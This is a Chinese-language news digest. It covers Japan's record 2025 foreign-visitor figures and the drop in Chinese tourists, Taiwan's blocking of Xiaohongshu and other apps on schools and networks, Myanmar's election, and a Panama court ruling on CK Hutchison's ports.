↩️ 日本出入国在留管理厅30日公布数据,2025年外国游客访日人次为4243万人次,相较前年增长15.4%,连续2年刷新纪录,也是自1950年开始记录以来,外国游客访日…
中国文旅部本月初曾召集中国国内多家大型旅行社负责人召开说明会,下达指示要求减少赴日签证申请数量,将赴日游客数量减至六成,并要求不得对外透露这一指示。 中国旅行业消息人士表示,指示是在高市答辩后的11月下旬下达的,理由是日本治安不靖,期限至12月。但进入12月后,又被要求延续至明年3月。 据悉,指示只针对团体游,个人游不包括在内。此外,考量到急剧削减申请数会引发消费者反感,指示要求要逐步削减。 日本政府消息人士就此表示,“还需要再观察一些数据才能判断影响,但大概是为加大对日本的施压力度。” 日本政府观光局推…
日本出入国在留管理厅30日公布数据,2025年外国游客访日人次为4243万人次,相较前年增长15.4%,连续2年刷新纪录,也是自1950年开始记录以来,外国游客访日人次首次突破4000万。
按国籍和地区划分,韩国游客最多,为923万人次。其次是中国游客,有722万人次,全年增幅虽达3%,但12月新增入境人次较前年减少25万人,降幅达46.6%。第三是台湾游客,为639万人次。
有关外国游客增加,入管厅解释称系受到日元贬值和国际定期航班增加的影响。中国游客急减则被认为是受高市国会涉台答辩影响,中国政府呼吁民众避免赴日旅行所致。
(时事通信)
↩️ 台湾,教育部常务次长朱俊彰1月30日表示,抖音、小红书、微信、微博、百度云盘等App已被数发部认定有信息安全风险,且危害儿少身心健康。除数发部已采取的…
台湾警方12月4日发布网络管制命令,封锁小红书一年。包括停止DNS解析、限制IP地址接取,预计在数小时内完成实施。 发布会说:小红书在台用户300万人,诈骗案去年有950件、损失新台币1.33亿元,今年1至11月756件、1.15亿元,类型有假网拍、解除分期付款、假投资、假交友、色情应召诈财等。警方办案无法调取必要资料,难以侦办,形成实质法律真空。 新闻稿说:Meta、Google、LINE、TikTok等均已在台设置法人、履行反诈义务,其余平台也应主动配合。政府10月14日通过海基会去函小红书(上海行吟…
台湾,教育部常务次长朱俊彰1月30日表示,抖音、小红书、微信、微博、百度云盘等App已被数发部认定有信息安全风险,且危害儿少身心健康。除数发部已采取的禁止校园公务设备下载使用、中小学TANet阻断上述服务的措施外,教育部所属机关学校iTaiwan无线网也将阻断上述服务。
目前,台湾中小学TANet的过滤机制均为DNS阻断,用户在浏览器设置DoH即会失效。去年12月警方在全台阻断小红书域名解析,也仅影响了其网页加载,App仍可照常使用。
(中华民国教育部)
缅甸军方支持的联邦巩固与发展党1月26日声称赢得了大选。此次大选投票排除了主要反对党,批评者认为此次选举既不自由也不公正。 对于此次选举,菲律宾外长称东盟…
缅甸军方支持的联邦巩固与发展党1月26日声称赢得了大选。此次大选投票排除了主要反对党,批评者认为此次选举既不自由也不公正。
对于此次选举,菲律宾外长称东盟并未认可已举行的选举的三个阶段。
(美联社)
↩️ 巴拿马最高法院1月29日晚裁定,巴拿马政府当年授权巴拿马港口公司建设运营港口的行为违宪。受判决影响,香港长江和记股价下跌5%。 巴拿马港口公司称,法院…
美国国防部长赫格塞思4月8日访问巴拿马,成为数十年来首位访问该国的美国防长。 赫格塞思表示,巴拿马运河面临来自中国的持续威胁,美国和巴拿马将共同维护运河安全。赫格塞思提及长江和记控制的两个港口,认为这使中国有可能在巴拿马各地进行监视活动。 会谈结束后不久,中国驻巴拿马使馆发表声明,抨击美国利用“勒索”来促进自身利益,表示巴拿马与谁开展业务是该国的主权决定,美国无权干涉。 巴拿马政府正在对长和对港口的租约进行审计,并在4月7日晚得出结论认为租约存在违规行为,导致巴拿马损失约3亿美元的收入。审计长表示,审计结…
巴拿马最高法院1月29日晚裁定,巴拿马政府当年授权巴拿马港口公司建设运营港口的行为违宪。受判决影响,香港长江和记股价下跌5%。
巴拿马港口公司称,法院裁决缺乏法律依据,危及依赖港口活动的家庭以及国家法治。该公司表示将保留在巴拿马等地合法处理的权利。
(美联社,路透社)
福利分享
机房故障了哈🙃
机房故障了哈
